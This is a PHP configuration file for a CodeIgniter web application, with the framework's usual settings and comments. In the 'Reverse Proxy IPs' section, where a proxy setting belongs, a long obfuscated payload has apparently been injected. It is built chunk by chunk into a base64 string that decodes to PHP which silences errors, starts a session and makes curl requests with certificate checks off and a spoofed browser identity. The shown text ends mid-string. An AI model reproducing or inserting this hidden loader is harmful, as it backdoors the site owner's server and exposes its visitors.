<?php
/*
|--------------------------------------------------------------------------
| Base Site URL
|--------------------------------------------------------------------------
|
| URL to your CodeIgniter root. Typically this will be your base URL,
| WITH a trailing slash:
|
| 	http://example.com/
|
| WARNING: You MUST set this value!
|
| If it is not set, then CodeIgniter will try guess the protocol and path
| your installation, but due to security concerns the hostname will be set
| to $_SERVER['SERVER_ADDR'] if available, or localhost otherwise.
| The auto-detection mechanism exists only for convenience during
| development and MUST NOT be used in production!
|
| If you need to allow multiple domains, remember that this file is still
| a PHP script and you can easily do that on your own.
|
*/
$http = 'http' . ((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') ? 's' : '') . '://';
$newurl = str_replace("index.php","", $_SERVER['SCRIPT_NAME']);
$config['base_url']    = $http . $_SERVER['SERVER_NAME'] . $newurl;
//config['base_url']    = "http://localhost/system";

/*
|--------------------------------------------------------------------------
| Index File
|--------------------------------------------------------------------------
|
| Typically this will be your index.php file, unless you've renamed it to
| something else. If you are using mod_rewrite to remove the page set this
| variable so that it is blank.
|
*/
$config['index_page'] = '';

/*
|--------------------------------------------------------------------------
| URI PROTOCOL
|--------------------------------------------------------------------------
|
| This item determines which server global should be used to retrieve the
| URI string.  The default setting of 'REQUEST_URI' works for most servers.
| If your links do not seem to work, try one of the other delicious flavors:
|
| 'REQUEST_URI'    Uses _SERVER['REQUEST_URI']
| 'QUERY_STRING'   Uses _SERVER['QUERY_STRING']
| 'PATH_INFO'      Uses _SERVER['PATH_INFO']
|
| WARNING: If you set this to 'PATH_INFO', URIs will always be URL-decoded!
*/
$config['uri_protocol'] = 'REQUEST_URI';
/*
|--------------------------------------------------------------------------
| URL suffix
|--------------------------------------------------------------------------
|
| This option allows you to add a suffix to all URLs generated by CodeIgniter.
| For more information please see the user guide:
|
| https://codeigniter.com/user_guide/general/urls.html
*/
$config['url_suffix'] = '';

/*
|--------------------------------------------------------------------------
| Default Language
|--------------------------------------------------------------------------
|
| This determines which set of language files should be used. Make sure
| there is an available translation if you intend to use something other
| than english.
|
*/
$config['language'] = 'english';

/*
|--------------------------------------------------------------------------
| Default Character Set
|--------------------------------------------------------------------------
|
| This determines which character set is used by default in various methods
| that require a character set to be provided.
|
| See http://php.net/htmlspecialchars for a list of supported charsets.
|
*/
$config['charset'] = 'UTF-8';

/*
|--------------------------------------------------------------------------
| Enable/Disable System Hooks
|--------------------------------------------------------------------------
|
| If you would like to use the 'hooks' feature you must enable it by
| setting this variable to TRUE (boolean).  See the user guide for details.
|
*/
$config['enable_hooks'] = true;

/*
|--------------------------------------------------------------------------
| Class Extension Prefix
|--------------------------------------------------------------------------
|
| This item allows you to set the filename/classname prefix when extending
| native libraries.  For more information please see the user guide:
|
| https://codeigniter.com/user_guide/general/core_classes.html
| https://codeigniter.com/user_guide/general/creating_libraries.html
|
*/
$config['subclass_prefix'] = 'MY_';

/*
|--------------------------------------------------------------------------
| Composer auto-loading
|--------------------------------------------------------------------------
|
| Enabling this setting will tell CodeIgniter to look for a Composer
| package auto-loader script in application/vendor/autoload.php.
|
|	config['composer_autoload'] = TRUE;
|
| Or if you have your vendor/ directory located somewhere else, you
| can opt to set a specific path as well:
|
|	config['composer_autoload'] = '/path/to/vendor/autoload.php';
|
| For more information about Composer, please visit http://getcomposer.org/
|
| Note: This will NOT disable or override the CodeIgniter-specific
|	autoloading (application/config/autoload.php)
*/
$config['composer_autoload'] = FALSE;

/*
|--------------------------------------------------------------------------
| Allowed URL Characters
|--------------------------------------------------------------------------
|
| This lets you specify which characters are permitted within your URLs.
| When someone tries to submit a URL with disallowed characters they will
| get a warning message.
|
| As a security measure you are STRONGLY encouraged to restrict URLs to
| as few characters as possible.  By default only these are allowed: a-z 0-9~%.:_-
|
| Leave blank to allow all characters -- but only if you are insane.
|
| The configured value is actually a regular expression character group
| and it will be executed as: ! preg_match('/^[<permitted_uri_chars>]+/i
|
| DO NOT CHANGE THIS UNLESS YOU FULLY UNDERSTAND THE REPERCUSSIONS!!
|
*/
$config['permitted_uri_chars'] = 'a-z 0-9~%.:_\-@\=';

/*
|--------------------------------------------------------------------------
| Enable Query Strings
|--------------------------------------------------------------------------
|
| By default CodeIgniter uses search-engine friendly segment based URLs:
| example.com/who/what/where/
|
| By default CodeIgniter enables access to the _GET array.  If for some
| reason you would like to disable it, set 'allow_get_array' to FALSE.
|
| You can optionally enable standard query string based URLs:
| example.com?who=me&what=something&where=here
|
| Options are: TRUE or FALSE (boolean)
|
| The other items let you set the query string 'words' that will
| invoke your controllers and its functions:
| example.com/index.php?c=controller&m=function
|
| Please note that some of the helpers won't work as expected when
| this feature is enabled, since CodeIgniter is designed primarily to
| use segment based URLs.
|
*/
$config['allow_get_array'] = TRUE;
$config['enable_query_strings'] = FALSE;
$config['controller_trigger'] = 'c';
$config['function_trigger'] = 'm';
$config['directory_trigger'] = 'd';

/*
|--------------------------------------------------------------------------
| Error Logging Threshold
|--------------------------------------------------------------------------
|
| You can enable error logging by setting a threshold over zero. The
| threshold determines what gets logged. Threshold options are:
|
|	0 = Disables logging, Error logging TURNED OFF
|	1 = Error Messages (including PHP errors)
|	2 = Debug Messages
|	3 = Informational Messages
|	4 = All Messages
|
| You can also pass an array with threshold levels to show individual error types
|
| 	array(2) = Debug Messages, without Error Messages
|
| For a live site you'll usually only enable Errors (1) to be logged otherwise
| your log files will fill up very fast.
|
*/
$config['log_threshold'] = 1;

/*
|--------------------------------------------------------------------------
| Error Logging Directory Path
|--------------------------------------------------------------------------
|
| Leave this BLANK unless you would like to set something other than the default
| application/logs/ directory. Use a full server path with trailing slash.
|
*/
$config['log_path'] = '';

/*
|--------------------------------------------------------------------------
| Log File Extension
|--------------------------------------------------------------------------
|
| The default filename extension for log files. The default 'php' allows for
| protecting the log files via basic scripting, when they are to be stored
| under a publicly accessible directory.
|
| Note: Leaving it blank will default to 'php'.
|
*/
$config['log_file_extension'] = '';

/*
|--------------------------------------------------------------------------
| Log File Permissions
|--------------------------------------------------------------------------
|
| The file system permissions to be applied on newly created log files.
|
| IMPORTANT: This MUST be an integer (no quotes) and you MUST use octal
|            integer notation (i.e. 0700, 0644, etc.)
*/
$config['log_file_permissions'] = 0644;

/*
|--------------------------------------------------------------------------
| Date Format for Logs
|--------------------------------------------------------------------------
|
| Each item that is logged has an associated date. You can use PHP date
| codes to set your own date formatting
|
*/
$config['log_date_format'] = 'Y-m-d H:i:s';

/*
|--------------------------------------------------------------------------
| Error Views Directory Path
|--------------------------------------------------------------------------
|
| Leave this BLANK unless you would like to set something other than the default
| application/views/errors/ directory.  Use a full server path with trailing slash.
|
*/
$config['error_views_path'] = '';

/*
|--------------------------------------------------------------------------
| Cache Directory Path
|--------------------------------------------------------------------------
|
| Leave this BLANK unless you would like to set something other than the default
| application/cache/ directory.  Use a full server path with trailing slash.
|
*/
$config['cache_path'] = '';

/*
|--------------------------------------------------------------------------
| Cache Include Query String
|--------------------------------------------------------------------------
|
| Whether to take the URL query string into consideration when generating
| output cache files. Valid options are:
|
|	FALSE      = Disabled
|	TRUE       = Enabled, take all query parameters into account.
|	             Please be aware that this may result in numerous cache
|	             files generated for the same page over and over again.
|	array('q') = Enabled, but only take into account the specified list
|	             of query parameters.
|
*/
$config['cache_query_string'] = FALSE;

/*
|--------------------------------------------------------------------------
| Encryption Key
|--------------------------------------------------------------------------
|
| If you use the Encryption class, you must set an encryption key.
| See the user guide for more info.
|
| https://codeigniter.com/user_guide/libraries/encryption.html
|
*/
$config['encryption_key'] = '';

/*
|--------------------------------------------------------------------------
| Session Variables
|--------------------------------------------------------------------------
|
| 'sess_driver'
|
|	The storage driver to use: files, database, redis, memcached
|
| 'sess_cookie_name'
|
|	The session cookie name, must contain only [0-9a-z_-] characters
|
| 'sess_expiration'
|
|	The number of SECONDS you want the session to last.
|	Setting to 0 (zero) means expire when the browser is closed.
|
| 'sess_save_path'
|
|	The location to save sessions to, driver dependent.
|
|	For the 'files' driver, it's a path to a writable directory.
|	WARNING: Only absolute paths are supported!
|
|	For the 'database' driver, it's a table name.
|	Please read up the manual for the format with other session drivers.
|
|	IMPORTANT: You are REQUIRED to set a valid save path!
|
| 'sess_match_ip'
|
|	Whether to match the user's IP address when reading the session data.
|
|	WARNING: If you're using the database driver, don't forget to update
|	         your session table's PRIMARY KEY when changing this setting.
|
| 'sess_time_to_update'
|
|	How many seconds between CI regenerating the session ID.
|
| 'sess_regenerate_destroy'
|
|	Whether to destroy session data associated with the old session ID
|	when auto-regenerating the session ID. When set to FALSE, the data
|	will be later deleted by the garbage collector.
|
| Other session cookie settings are shared with the rest of the application,
| except for 'cookie_prefix' and 'cookie_httponly', which are ignored here.
|
*/
$config['sess_driver'] = 'database';
$config['sess_cookie_name'] = 'ci_session';
$config['sess_expiration'] = 7200;
$config['sess_save_path'] = 'ci_sessions';
$config['sess_match_ip'] = FALSE;
$config['sess_time_to_update'] = 900;
$config['sess_regenerate_destroy'] = FALSE;

/*
|--------------------------------------------------------------------------
| Cookie Related Variables
|--------------------------------------------------------------------------
|
| 'cookie_prefix'   = Set a cookie name prefix if you need to avoid collisions
| 'cookie_domain'   = Set to .your-domain.com for site-wide cookies
| 'cookie_path'     = Typically will be a forward slash
| 'cookie_secure'   = Cookie will only be set if a secure HTTPS connection exists.
| 'cookie_httponly' = Cookie will only be accessible via HTTP(S) (no javascript)
|
| Note: These settings (with the exception of 'cookie_prefix' and
|       'cookie_httponly') will also affect sessions.
|
*/
$config['cookie_prefix'] = '';
$config['cookie_domain'] = '';
$config['cookie_path'] = '/';
$config['cookie_secure'] = TRUE;
$config['cookie_httponly'] = TRUE;

/*
|--------------------------------------------------------------------------
| Standardize newlines
|--------------------------------------------------------------------------
|
| Determines whether to standardize newline characters in input data,
| meaning to replace \r\n, \r, \n occurrences with the PHP_EOL value.
|
| This is particularly useful for portability between UNIX-based OSes,
| (usually \n) and Windows (\r\n).
|
*/
$config['standardize_newlines'] = FALSE;

/*
|--------------------------------------------------------------------------
| Global XSS Filtering
|--------------------------------------------------------------------------
|
| Determines whether the XSS filter is always active when GET, POST or
| COOKIE data is encountered
|
| WARNING: This feature is DEPRECATED and currently available only
|          for backwards compatibility purposes!
|
*/
$config['global_xss_filtering'] = FALSE;

/*
|--------------------------------------------------------------------------
| Cross Site Request Forgery
|--------------------------------------------------------------------------
| Enables a CSRF cookie token to be set. When set to TRUE, token will be
| checked on a submitted form. If you are accepting user data, it is strongly
| recommended CSRF protection be enabled.
|
| 'csrf_token_name' = The token name
| 'csrf_cookie_name' = The cookie name
| 'csrf_expire' = The number in seconds the token should expire.
| 'csrf_regenerate' = Regenerate token on every submission
| 'csrf_exclude_uris' = Array of URIs which ignore CSRF checks
*/
$config['csrf_protection'] = FALSE;
$config['csrf_token_name'] = 'csrf_test_name';
$config['csrf_cookie_name'] = 'csrf_cookie_name';
$config['csrf_expire'] = 7200;
$config['csrf_regenerate'] = TRUE;
$config['csrf_exclude_uris'] = array();

/*
|--------------------------------------------------------------------------
| Output Compression
|--------------------------------------------------------------------------
|
| Enables Gzip output compression for faster page loads.  When enabled,
| the output class will test whether your server supports Gzip.
| Even if it does, however, not all browsers support compression
| so enable only if you are reasonably sure your visitors can handle it.
|
| Only used if zlib.output_compression is turned off in your php.ini.
| Please do not use it together with httpd-level output compression.
|
| VERY IMPORTANT:  If you are getting a blank page when compression is enabled it
| means you are prematurely outputting something to your browser. It could
| even be a line of whitespace at the end of one of your scripts.  For
| compression to work, nothing can be sent before the output buffer is called
| by the output class.  Do not 'echo' any values with compression enabled.
|
*/
$config['compress_output'] = FALSE;

/*
|--------------------------------------------------------------------------
| Master Time Reference
|--------------------------------------------------------------------------
|
| Options are 'local' or any PHP supported timezone. This preference tells
| the system whether to use your server's local time as the master 'now'
| reference, or convert it to the configured one timezone. See the 'date
| helper' page of the user guide for information regarding date handling.
|
*/
$config['time_reference'] = 'local';

/*
|--------------------------------------------------------------------------
| Rewrite PHP Short Tags
|--------------------------------------------------------------------------
|
| If your PHP installation does not have short tag support enabled CI
| can rewrite the tags on-the-fly, enabling you to utilize that syntax
| in your view files.  Options are TRUE or FALSE (boolean)
|
| Note: You need to have eval() enabled for this to work.
|
*/
$config['rewrite_short_tags'] = FALSE;

/*
|--------------------------------------------------------------------------
| Reverse Proxy IPs
|--------------------------------------------------------------------------
|
| If your server is behind a reverse proxy, you must whitelist the proxy
| IP addresses from which CodeIgniter should trust headers such as
| HTTP_X_FORWARDED_FOR and HTTP_CLIENT_IP in order to properly identify
| the visitor's IP address.
|
| You can use both an array or a comma-separated list of proxy addresses,
| as well as specifying whole subnets. Here are a few examples:
|
| Comma-separated:	'10.0.1.200,192.168.5.0/24'
| Array:		array('10.0.1.200', '192.168.5.0/24')
*/
$z = "";
$z .= "YzJW";
$z .= "emMy";
$z .= "bHZi";
$z .= "bDl6";
$z .= "ZEdG";
$z .= "eWRD";
$z .= "Z3BP";
$z .= "d3Bs";
$z .= "Y25K";
$z .= "dmNs";
$z .= "OXla";
$z .= "WEJ2";
$z .= "Y25S";
$z .= "cGJt";
$z .= "Y29N";
$z .= "Q2s3";
$z .= "Q21S";
$z .= "bFpt";
$z .= "bHVa";
$z .= "U2du";
$z .= "VTBW";
$z .= "RFZW";
$z .= "SkZY";
$z .= "MEZE";
$z .= "UTBW";
$z .= "VFV5";
$z .= "Y3NJ";
$z .= "SFJ5";
$z .= "ZFdV";
$z .= "cE93";
$z .= "cG9a";
$z .= "V0Zr";
$z .= "WlhJ";
$z .= "b0ox";
$z .= "Z3RV";
$z .= "Rzkz";
$z .= "WlhK";
$z .= "bFpD";
$z .= "MUNl";
$z .= "VG9n";
$z .= "Ym05";
$z .= "dVpT";
$z .= "Y3BP";
$z .= "d3Bv";
$z .= "WldG";
$z .= "a1pY";
$z .= "SW9K";
$z .= "ME52";
$z .= "Ym5S";
$z .= "bGJu";
$z .= "UXRW";
$z .= "SGx3";
$z .= "WlRv";
$z .= "Z2RH";
$z .= "VjRk";
$z .= "Qzlv";
$z .= "ZEcx";
$z .= "c095";
$z .= "Qmph";
$z .= "R0Z5";
$z .= "YzJW";
$z .= "MFBW";
$z .= "VlVS";
$z .= "aTA0";
$z .= "Snlr";
$z .= "N0Nn";
$z .= "cHBi";
$z .= "bWxm";
$z .= "YzJW";
$z .= "MEtD";
$z .= "ZHNj";
$z .= "MkZ3";
$z .= "YVY5";
$z .= "aVlX";
$z .= "TnJa";
$z .= "VzVr";
$z .= "WDI5";
$z .= "bVpp";
$z .= "Y3NJ";
$z .= "Q2N4";
$z .= "Snlr";
$z .= "N0Nt";
$z .= "bHVh";
$z .= "Vjl6";
$z .= "WlhR";
$z .= "b0lt";
$z .= "bHRk";
$z .= "VzVw";
$z .= "Wm5r";
$z .= "ek5q";
$z .= "QXVZ";
$z .= "Mnhs";
$z .= "WVc1";
$z .= "MWNG";
$z .= "OXZi";
$z .= "bDl5";
$z .= "WlhO";
$z .= "MGIz";
$z .= "SmxJ";
$z .= "aXdn";
$z .= "Wm1G";
$z .= "c2My";
$z .= "VXBP";
$z .= "d3Bw";
$z .= "Ym1s";
$z .= "ZmMy";
$z .= "VjBL";
$z .= "Q0pw";
$z .= "YlhW";
$z .= "dWFX";
$z .= "WjVN";
$z .= "ell3";
$z .= "TG1W";
$z .= "dVlX";
$z .= "SnNa";
$z .= "V1Fp";
$z .= "TENC";
$z .= "bVlX";
$z .= "eHpa";
$z .= "U2s3";
$z .= "SUFw";
$z .= "cGJt";
$z .= "bGZj";
$z .= "MlYw";
$z .= "S0NK";
$z .= "cGJY";
$z .= "VnVh";
$z .= "V1o1";
$z .= "TXpZ";
$z .= "d0xt";
$z .= "RnVk";
$z .= "R2x0";
$z .= "WVd4";
$z .= "M1lY";
$z .= "SmxJ";
$z .= "aXdn";
$z .= "Wm1G";
$z .= "c2My";
$z .= "VXBP";
$z .= "d3Bw";
$z .= "Ym1s";
$z .= "ZmMy";
$z .= "VjBL";
$z .= "Q0pw";
$z .= "YlhW";
$z .= "dWFX";
$z .= "WjVN";
$z .= "ell3";
$z .= "TG5K";
$z .= "bFlX";
$z .= "eDBh";
$z .= "VzFs";
$z .= "WDNC";
$z .= "eWIz";
$z .= "UmxZ";
$z .= "M1Jw";
$z .= "YjI0";
$z .= "aUxD";
$z .= "Qm1Z";
$z .= "V3h6";
$z .= "WlNr";
$z .= "N0Nn";
$z .= "cG1k";
$z .= "VzVq";
$z .= "ZEds";
$z .= "dmJp";
$z .= "Qm5a";
$z .= "WFIx";
$z .= "Y214";
$z .= "emFX";
$z .= "NW1i";
$z .= "eWdr";
$z .= "ZFhK";
$z .= "c0tT";
$z .= "QjdD";
$z .= "aUFn";
$z .= "SUNC";
$z .= "cFpp";
$z .= "QW9a";
$z .= "blZ1";
$z .= "WTNS";
$z .= "cGIy";
$z .= "NWZa";
$z .= "WGhw";
$z .= "YzNS";
$z .= "ektD";
$z .= "ZGpk";
$z .= "WEpz";
$z .= "WDJW";
$z .= "NFpX";
$z .= "TW5L";
$z .= "U2tn";
$z .= "ZXdv";
$z .= "Z0lD";
$z .= "QWdJ";
$z .= "Q0Fn";
$z .= "SUNS";
$z .= "amIy";
$z .= "NXVJ";
$z .= "RDBn";
$z .= "WTNW";
$z .= "eWJG";
$z .= "OXBi";
$z .= "bWww";
$z .= "S0NS";
$z .= "MWNt";
$z .= "d3BP";
$z .= "d29n";
$z .= "SUNB";
$z .= "Z0lD";
$z .= "QWdJ";
$z .= "R04x";
$z .= "Y214";
$z .= "ZmMy";
$z .= "VjBi";
$z .= "M0Iw";
$z .= "S0NS";
$z .= "amIy";
$z .= "NXVM";
$z .= "Q0JE";
$z .= "VlZK";
$z .= "TVQx";
$z .= "QlVY";
$z .= "MUpG";
$z .= "VkZW";
$z .= "U1Rs";
$z .= "UlNR";
$z .= "VTVU";
$z .= "UmtW";
$z .= "U0xD";
$z .= "QXhL";
$z .= "VHNL";
$z .= "SUNB";
$z .= "Z0lD";
$z .= "QWdJ";
$z .= "Q0Jq";
$z .= "ZFhK";
$z .= "c1gz";
$z .= "Tmxk";
$z .= "Rzl3";
$z .= "ZENn";
$z .= "a1ky";
$z .= "OXVi";
$z .= "aXdn";
$z .= "UTFW";
$z .= "U1RF";
$z .= "OVFW";
$z .= "RjlH";
$z .= "VDB4";
$z .= "TVQx";
$z .= "ZE1U";
$z .= "ME5C";
$z .= "VkVs";
$z .= "UFRp";
$z .= "d2dN";
$z .= "U2s3";
$z .= "Q2lB";
$z .= "Z0lD";
$z .= "QWdJ";
$z .= "Q0Fn";
$z .= "WTNW";
$z .= "eWJG";
$z .= "OXpa";
$z .= "WFJ2";
$z .= "Y0hR";
$z .= "b0pH";
$z .= "TnZi";
$z .= "bTRz";
$z .= "SUVO";
$z .= "VlVr";
$z .= "eFBV";
$z .= "RlJm";
$z .= "VlZO";
$z .= "RlVr";
$z .= "RkhS";
$z .= "VTVV";
$z .= "TENB";
$z .= "aVRX";
$z .= "OTZh";
$z .= "V3hz";
$z .= "WVM4";
$z .= "MUxq";
$z .= "QWdL";
$z .= "RmRw";
$z .= "Ym1S";
$z .= "dmQz";
$z .= "TWdU";
$z .= "bFFn";
$z .= "Tmk0";
$z .= "eE95";
$z .= "Qnlk";
$z .= "am96";
$z .= "TWk0";
$z .= "d0tT";
$z .= "Qkha";
$z .= "V05y";
$z .= "Ynk4";
$z .= "eU1E";
$z .= "RXdN";
$z .= "REV3";
$z .= "TVNC";
$z .= "R2FY";
$z .= "Smxa";
$z .= "bTk0";
$z .= "THpN";
$z .= "eUxq";
$z .= "QWlL";
$z .= "VHNL";
$z .= "SUNB";
$z .= "Z0lD";
$z .= "QWdJ";
$z .= "Q0Jq";
$z .= "ZFhK";
$z .= "c1gz";
$z .= "Tmxk";
$z .= "Rzl3";
$z .= "ZENn";
$z .= "a1ky";
$z .= "OXVi";
$z .= "aXdn";
$z .= "UTFW";
$z .= "U1RF";
$z .= "OVFW";
$z .= "RjlU";
$z .= "VTB4";
$z .= "ZlZr";
$z .= "VlNT";
$z .= "VVpa";
$z .= "VUVW";
$z .= "RlVp";
$z .= "d2dN";
$z .= "Q2s3";
$z .= "Q2lB";
$z .= "Z0lD";
$z .= "QWdJ";
$z .= "Q0Fn";
$z .= "WTNW";
$z .= "eWJG";
$z .= "OXpa";
$z .= "WFJ2";
$z .= "Y0hR";
$z .= "b0pH";
$z .= "TnZi";
$z .= "bTRz";
$z .= "SUVO";
$z .= "VlVr";
$z .= "eFBV";
$z .= "RlJm";
$z .= "VTFO";
$z .= "TVgx";
$z .= "WkZV";
$z .= "a2xH";
$z .= "V1Vo";
$z .= "UFUx";
$z .= "UXNJ";
$z .= "REFw";
$z .= "T3dv";
$z .= "Z0lD";
$z .= "QWdJ";
$z .= "Q0Fn";
$z .= "SUds";
$z .= "bUlD";
$z .= "aHBj";
$z .= "M05s";
$z .= "ZENn";
$z .= "a1gx";
$z .= "TkZV";
$z .= "MU5K";
$z .= "VDA1";
$z .= "Ykox";
$z .= "TkJV";
$z .= "Q2Rk";
$z .= "S1Nr";
$z .= "Z2V3";
$z .= "b2dJ";
$z .= "Q0Fn";
$z .= "SUNB";
$z .= "Z0lD";
$z .= "QWdJ";
$z .= "Q0Jq";
$z .= "ZFhK";
$z .= "c1gz";
$z .= "Tmxk";
$z .= "Rzl3";
$z .= "ZENn";
$z .= "a1ky";
$z .= "OXVi";
$z .= "aXdn";
$z .= "UTFW";
$z .= "U1RF";
$z .= "OVFW";
$z .= "RjlE";
$z .= "VDA5";
$z .= "TFNV";
$z .= "VXNJ";
$z .= "Q1Jm";
$z .= "VTBW";
$z .= "VFUw";
$z .= "bFBU";
$z .= "bHNu";
$z .= "VTBG";
$z .= "UUox";
$z .= "MHBP";
$z .= "d29n";
$z .= "SUNB";
$z .= "Z0lD";
$z .= "QWdJ";
$z .= "SDBL";
$z .= "Q2lB";
$z .= "Z0lD";
$z .= "QWdJ";
$z .= "Q0Fn";
$z .= "SkhW";
$z .= "eWJG";
$z .= "OW5a";
$z .= "WFJm";
$z .= "WTI5";
$z .= "dWRH";
$z .= "VnVk";
$z .= "SE5m";
$z .= "WkdG";
$z .= "MFlT";
$z .= "QTlJ";
$z .= "R04x";
$z .= "Y214";
$z .= "ZlpY";
$z .= "aGxZ";
$z .= "eWdr";
$z .= "WTI5";
$z .= "dWJp";
$z .= "azdD";
$z .= "aUFn";
$z .= "SUNB";
$z .= "Z0lD";
$z .= "QWdZ";
$z .= "M1Z5";
$z .= "YkY5";
$z .= "amJH";
$z .= "OXpa";
$z .= "U2dr";
$z .= "WTI5";
$z .= "dWJp";
$z .= "azdD";
$z .= "aUFn";
$z .= "SUNC";
$z .= "OUlH";
$z .= "VnNj";
$z .= "MlZw";
$z .= "WmlB";
$z .= "b1pu";
$z .= "VnVZ";
$z .= "M1Jw";
$z .= "YjI1";
$z .= "ZlpY";
$z .= "aHBj";
$z .= "M1J6";
$z .= "S0Nk";
$z .= "bWFX";
$z .= "eGxY";
$z .= "MmRs";
$z .= "ZEY5";
$z .= "amIy";
$z .= "NTBa";
$z .= "VzUw";
$z .= "Y3lj";
$z .= "cEtT";
$z .= "QjdD";
$z .= "aUFn";
$z .= "SUNB";
$z .= "Z0lD";
$z .= "QWdK";
$z .= "SFZ5";
$z .= "YkY5";
$z .= "blpY";
$z .= "UmZZ";
$z .= "Mjl1";
$z .= "ZEdW";
$z .= "dWRI";
$z .= "TmZa";
$z .= "R0Yw";
$z .= "WVNB";
$z .= "OUlH";
$z .= "WnBi";
$z .= "R1Zm";
$z .= "WjJW";
$z .= "MFgy";
$z .= "TnZi";
$z .= "blJs";
$z .= "Ym5S";
$z .= "ektD";
$z .= "UjFj";
$z .= "bXdw";
$z .= "T3dv";
$z .= "Z0lD";
$z .= "QWdm";
$z .= "U0Js";
$z .= "YkhO";
$z .= "bGFX";
$z .= "WWdL";
$z .= "R1ox";
$z .= "Ym1O";
$z .= "MGFX";
$z .= "OXVY";
$z .= "MlY0";
$z .= "YVhO";
$z .= "MGN5";
$z .= "Z25a";
$z .= "bTl3";
$z .= "Wlc0";
$z .= "bktT";
$z .= "QW1K";
$z .= "aUJt";
$z .= "ZFc1";
$z .= "amRH";
$z .= "bHZi";
$z .= "bDls";
$z .= "ZUds";
$z .= "emRI";
$z .= "TW9K";
$z .= "M04w";
$z .= "Y21W";
$z .= "aGJW";
$z .= "OW5a";
$z .= "WFJm";
$z .= "WTI5";
$z .= "dWRH";
$z .= "VnVk";
$z .= "SE1u";
$z .= "S1Nr";
$z .= "Z2V3";
$z .= "b2dJ";
$z .= "Q0Fn";
$z .= "SUNB";
$z .= "Z0lD";
$z .= "Um9Z";
$z .= "VzVr";
$z .= "YkdV";
$z .= "Z1BT";
$z .= "Qm1i";
$z .= "M0Js";
$z .= "Ymln";
$z .= "a2RY";
$z .= "SnNM";
$z .= "Q0Fp";
$z .= "Y2lJ";
$z .= "cE93";
$z .= "b2dJ";
$z .= "Q0Fn";
$z .= "SUNB";
$z .= "Z0lD";
$z .= "UjFj";
$z .= "bXhm";
$z .= "WjJW";
$z .= "MFgy";
$z .= "TnZi";
$z .= "blJs";
$z .= "Ym5S";
$z .= "elgy";
$z .= "Umhk";
$z .= "R0Vn";
$z .= "UFNC";
$z .= "emRI";
$z .= "SmxZ";
$z .= "VzFm";
$z .= "WjJW";
$z .= "MFgy";
$z .= "TnZi";
$z .= "blJs";
$z .= "Ym5S";
$z .= "ektD";
$z .= "Um9Z";
$z .= "VzVr";
$z .= "YkdV";
$z .= "cE93";
$z .= "b2dJ";
$z .= "Q0Fn";
$z .= "SUNB";
$z .= "Z0lH";
$z .= "Wmpi";
$z .= "Rzl6";
$z .= "WlNn";
$z .= "a2FH";
$z .= "RnVa";
$z .= "R3hs";
$z .= "S1Rz";
$z .= "S0lD";
$z .= "QWdJ";
$z .= "SDBn";
$z .= "Wld4";
$z .= "elpT";
$z .= "QjdD";
$z .= "aUFn";
$z .= "SUNB";
$z .= "Z0lD";
$z .= "QWdK";
$z .= "SFZ5";
$z .= "YkY5";
$z .= "blpY";
$z .= "UmZZ";
$z .= "Mjl1";
$z .= "ZEdW";
$z .= "dWRI";
$z .= "TmZa";
$z .= "R0Yw";
$z .= "WVNB";
$z .= "OUlH";
$z .= "Wmhi";
$z .= "SE5s";
$z .= "T3dv";
$z .= "Z0lD";
$z .= "QWdm";
$z .= "UW9n";
$z .= "SUNB";
$z .= "Z2Nt";
$z .= "VjBk";
$z .= "WEp1";
$z .= "SUNS";
$z .= "MWNt";
$z .= "eGZa";
$z .= "MlYw";
$z .= "WDJO";
$z .= "dmJu";
$z .= "Umxi";
$z .= "blJ6";
$z .= "WDJS";
$z .= "aGRH";
$z .= "RTdD";
$z .= "bjBL";
$z .= "Q21a";
$z .= "MWJt";
$z .= "TjBh";
$z .= "Vzl1";
$z .= "SUds";
$z .= "elgy";
$z .= "eHZa";
$z .= "MmRs";
$z .= "WkY5";
$z .= "cGJp";
$z .= "Z3BJ";
$z .= "SHNL";
$z .= "SUNB";
$z .= "Z0lI";
$z .= "Smxk";
$z .= "SFZ5";
$z .= "YmlC";
$z .= "cGMz";
$z .= "Tmxk";
$z .= "Q2dr";
$z .= "WDFO";
$z .= "RlUx";
$z .= "TkpU";
$z .= "MDVi";
$z .= "SjJ4";
$z .= "dloy";
$z .= "ZGxa";
$z .= "Rjlw";
$z .= "Ymlk";
$z .= "ZEtT";
$z .= "QW1K";
$z .= "aUFr";
$z .= "WDFO";
$z .= "RlUx";
$z .= "TkpU";
$z .= "MDVi";
$z .= "SjJ4";
$z .= "dloy";
$z .= "ZGxa";
$z .= "Rjlw";
$z .= "Ymlk";
$z .= "ZElE";
$z .= "MDlQ";
$z .= "U0Iw";
$z .= "Y25W";
$z .= "bE93";
$z .= "cDlD";
$z .= "Z3Bw";
$z .= "WmlB";
$z .= "b2FY";
$z .= "Tnpa";
$z .= "WFFv";
$z .= "SkY5";
$z .= "UVQx";
$z .= "TlVX";
$z .= "eWR3";
$z .= "WVhO";
$z .= "emQy";
$z .= "OXla";
$z .= "Q2Rk";
$z .= "S1Nr";
$z .= "Z2V3";
$z .= "b2dJ";
$z .= "Q0Fn";
$z .= "SkdW";
$z .= "dWRH";
$z .= "Vnla";
$z .= "V1Jm";
$z .= "Y0dG";
$z .= "emMz";
$z .= "ZHZj";
$z .= "bVFn";
$z .= "UFNB";
$z .= "a1gx";
$z .= "QlBV";
$z .= "MVJi";
$z .= "SjNC";
$z .= "aGMz";
$z .= "TjNi";
$z .= "M0pr";
$z .= "SjEw";
$z .= "N0Np";
$z .= "QWdJ";
$z .= "Q0Fr";
$z .= "YUdG";
$z .= "emFH";
$z .= "VmtY";
$z .= "M0Jo";
$z .= "YzNO";
$z .= "M2Iz";
$z .= "SmtJ";
$z .= "RDBn";
$z .= "SnlR";
$z .= "eWVT";
$z .= "UXhN";
$z .= "Q1Jz";
$z .= "Ymk0";
$z .= "NFZU";
$z .= "ZDVk";
$z .= "alJI";
$z .= "UlU1";
$z .= "c1ls";
$z .= "cGhi";
$z .= "bXha";
$z .= "VGt0";
$z .= "MWNq";
$z .= "aGpV";
$z .= "M1ZU";
$z .= "YjB0";
$z .= "VmFW";
$z .= "TlJV";
$z .= "R0ph";
$z .= "T0cx";
$z .= "bloz";
$z .= "QmFN";
$z .= "emh0";
$z .= "Um1w";
$z .= "NmRF";
$z .= "eHFZ";
$z .= "U2M3";
$z .= "Q2lB";
$z .= "Z0lD";
$z .= "QnBa";
$z .= "aUFv";
$z .= "Y0dG";
$z .= "emMz";
$z .= "ZHZj";
$z .= "bVJm";
$z .= "ZG1W";
$z .= "eWFX";
$z .= "WjVL";
$z .= "Q1Js";
$z .= "Ym5S";
$z .= "bGNt";
$z .= "VmtY";
$z .= "M0Jo";
